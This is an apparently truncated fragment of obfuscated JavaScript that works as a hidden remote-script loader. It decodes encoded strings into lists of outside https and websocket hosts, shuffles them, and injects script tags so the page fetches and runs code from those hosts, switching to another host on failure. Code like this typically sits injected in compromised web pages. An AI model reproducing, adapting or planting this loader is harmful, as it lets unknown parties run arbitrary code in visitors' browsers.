s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};